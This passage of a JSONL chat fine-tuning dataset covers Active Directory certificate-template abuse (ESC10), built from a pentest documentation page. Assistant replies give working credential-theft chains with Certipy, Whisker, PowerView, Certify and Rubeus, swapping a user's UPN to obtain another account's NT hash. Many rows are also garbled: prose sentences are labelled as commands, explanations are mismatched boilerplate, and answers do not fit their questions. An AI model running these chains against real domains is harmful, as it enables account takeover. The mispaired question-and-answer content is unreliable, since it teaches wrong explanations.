vulnerable template that specifies the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value.`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 78, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "Then, the `userPrincipalName` of user2 is changed to user3 with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "Then, the `userPrincipalName` of user2 is changed to user3 with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1).", "metadata": {"corpus_index": 79, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Then, the `userPrincipalName` of user2 is changed to user3 with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1).`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Then, the `userPrincipalName` of user2 is changed to user3 with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1).`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 79, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use The for find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "The vulnerable certificate can be requested in a user2 session."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use The for find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "The vulnerable certificate can be requested in a user2 session.", "metadata": {"corpus_index": 80, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "The vulnerable certificate can be requested in a user2 session."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "The vulnerable certificate can be requested in a user2 session.", "metadata": {"corpus_index": 80, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The vulnerable certificate can be requested in a user2 session.`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The vulnerable certificate can be requested in a user2 session.`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 80, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use The for find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "The user2's UPN is changed back to something else."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use The for find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "The user2's UPN is changed back to something else.", "metadata": {"corpus_index": 81, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "The user2's UPN is changed back to something else."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "The user2's UPN is changed back to something else.", "metadata": {"corpus_index": 81, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The user2's UPN is changed back to something else.`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The user2's UPN is changed back to something else.`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 81, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Find vulnerable/abusable certificate templates using all groups the current user context is a part of: during a pentest?"}, {"role": "assistant", "content": "Now, authenticating with the obtained certificate will provide the user3's NT hash during [UnPac the hash](../kerberos/unpac-the-hash.md). This action can be realised with [Rubeus](https://github.com/GhostPack/Rubeus). The domain must be specified since it is not present in the certificate."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Find vulnerable/abusable certificate templates using all groups the current user context is a part of: during a pentest?", "response": "Now, authenticating with the obtained certificate will provide the user3's NT hash during [UnPac the hash](../kerberos/unpac-the-hash.md). This action can be realised with [Rubeus](https://github.com/GhostPack/Rubeus). The domain must be specified since it is not present in the certificate.", "metadata": {"corpus_index": 82, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Now, authenticating with the obtained certificate will provide the user3's NT hash during [UnPac the hash](../kerberos/unpac-the-hash.md). This action can be realised with [Rubeus](https://github.com/GhostPack/Rubeus). The domain must be specified since it is not present in the certificate.`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Now, authenticating with the obtained certificate will provide the user3's NT hash during [UnPac the hash](../kerberos/unpac-the-hash.md). This action can be realised with [Rubeus](https://github.com/GhostPack/Rubeus). The domain must be specified since it is not present in the certificate.`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 82, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Certificate templates - (ESC10) Weak certificate mapping"}, {"role": "assistant", "content": "To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in this section.\n\nThis ESC refers to a weak configuration of the registry keys:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Certificate templates - (ESC10) Weak certificate mapping", "response": "To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in this section.\n\nThis ESC refers to a weak configuration of the registry keys:", "metadata": {"corpus_index": 83, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC10) Weak certificate mapping"}, {"role": "assistant", "content": "To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in this section.\n\nThis ESC refers to a weak configuration of the registry keys:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC10) Weak certificate mapping", "response": "To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in this section.\n\nThis ESC refers to a weak configuration of the registry keys:", "metadata": {"corpus_index": 83, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Certificate templates - Case 1"}, {"role": "assistant", "content": "* StrongCertificateBindingEnforcement set to 0, meaning no strong mapping is performed\n * A template that specifiy client authentication is enabled (any template, like the built-in User template)\n * GenericWrite right against any account A to compromise any account B\n\n> [!WARNING]\n> At the time of writting (06/08/2022), there is no solution as a low privileged user to read the StrongCertificateBindingEnforcement value. It is worth to try the attack hopping the key is misconfigured.\n\n::: tabs\n\n=== Unix-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC10 scenario.\n\nIn this scenario, user1 has GenericWrite against user2 and want to compromise user3.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to user3.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3\n`\n\nA certificate permitting client authentication can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'\n`\n\nThe user2's UPN is changed back to something else.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash with UnPac the hash. The domain must be specified since it is not present in the certificate.\n\n`bash\ncertipy auth -pfx 'user3.pfx' -domain \"$DOMAIN\"\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Certificate templates - Case 1", "response": "* StrongCertificateBindingEnforcement set to 0, meaning no strong mapping is performed\n * A template that specifiy client authentication is enabled (any template, like the built-in User template)\n * GenericWrite right against any account A to compromise any account B\n\n> [!WARNING]\n> At the time of writting (06/08/2022), there is no solution as a low privileged user to read the StrongCertificateBindingEnforcement value. It is worth to try the attack hopping the key is misconfigured.\n\n::: tabs\n\n=== Unix-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC10 scenario.\n\nIn this scenario, user1 has GenericWrite against user2 and want to compromise user3.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to user3.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3\n`\n\nA certificate permitting client authentication can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'\n`\n\nThe user2's UPN is changed back to something else.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash with UnPac the hash. The domain must be specified since it is not present in the certificate.\n\n`bash\ncertipy auth -pfx 'user3.pfx' -domain \"$DOMAIN\"\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell", "metadata": {"corpus_index": 84, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate templates - Case 1?"}, {"role": "assistant", "content": "* StrongCertificateBindingEnforcement set to 0, meaning no strong mapping is performed\n * A template that specifiy client authentication is enabled (any template, like the built-in User template)\n * GenericWrite right against any account A to compromise any account B\n\n> [!WARNING]\n> At the time of writting (06/08/2022), there is no solution as a low privileged user to read the StrongCertificateBindingEnforcement value. It is worth to try the attack hopping the key is misconfigured.\n\n::: tabs\n\n=== Unix-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC10 scenario.\n\nIn this scenario, user1 has GenericWrite against user2 and want to compromise user3.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to user3.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3\n`\n\nA certificate permitting client authentication can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'\n`\n\nThe user2's UPN is changed back to something else.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash with UnPac the hash. The domain must be specified since it is not present in the certificate.\n\n`bash\ncertipy auth -pfx 'user3.pfx' -domain \"$DOMAIN\"\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate templates - Case 1?", "response": "* StrongCertificateBindingEnforcement set to 0, meaning no strong mapping is performed\n * A template that specifiy client authentication is enabled (any template, like the built-in User template)\n * GenericWrite right against any account A to compromise any account B\n\n> [!WARNING]\n> At the time of writting (06/08/2022), there is no solution as a low privileged user to read the StrongCertificateBindingEnforcement value. It is worth to try the attack hopping the key is misconfigured.\n\n::: tabs\n\n=== Unix-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC10 scenario.\n\nIn this scenario, user1 has GenericWrite against user2 and want to compromise user3.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to user3.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn user3\n`\n\nA certificate permitting client authentication can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'\n`\n\nThe user2's UPN is changed back to something else.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash with UnPac the hash. The domain must be specified since it is not present in the certificate.\n\n`bash\ncertipy auth -pfx 'user3.pfx' -domain \"$DOMAIN\"\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell", "metadata": {"corpus_index": 84, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the certipy command for certificate templates - case 1"}, {"role": "assistant", "content": "certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the certipy command for certificate templates - case 1", "response": "certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'", "metadata": {"corpus_index": 85, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate templates - Case 1 during a pentest?"}, {"role": "assistant", "content": "certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate templates - Case 1 during a pentest?", "response": "certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'", "metadata": {"corpus_index": 85, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'`?"}, {"role": "assistant", "content": "This command is used for certificate templates - case 1. Case 1"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'`?", "response": "This command is used for certificate templates - case 1. Case 1", "metadata": {"corpus_index": 85, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise user3.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to user3 with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user3'} -Verbose\n`\n\nA certificate permitting client authentication can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash during UnPac the hash. This action can be realised with Rubeus. The domain must be specified since it is not present in the certificate.\n\n`powershell\nRubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise user3.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to user3 with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user3'} -Verbose\n`\n\nA certificate permitting client authentication can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash during UnPac the hash. This action can be realised with Rubeus. The domain must be specified since it is not present in the certificate.\n\n`powershell\nRubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::", "metadata": {"corpus_index": 86, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise user3.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to user3 with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user3'} -Verbose\n`\n\nA certificate permitting client authentication can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash during UnPac the hash. This action can be realised with Rubeus. The domain must be specified since it is not present in the certificate.\n\n`powershell\nRubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise user3.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to user3 with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user3'} -Verbose\n`\n\nA certificate permitting client authentication can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n`\n\nNow, authenticating with the obtained certificate will provide the user3's NT hash during UnPac the hash. This action can be realised with Rubeus. The domain must be specified since it is not present in the certificate.\n\n`powershell\nRubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::", "metadata": {"corpus_index": 86, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "Here, user1 has `GenericWrite` against user2 and want to compromise user3.\n\nFirst, the user2's credentials are needed. It can be retrieved via a [Shadow Credentials](../kerberos/shadow-credentials.md) attack, for example. Here just the `msDs-KeyCredentialLink` 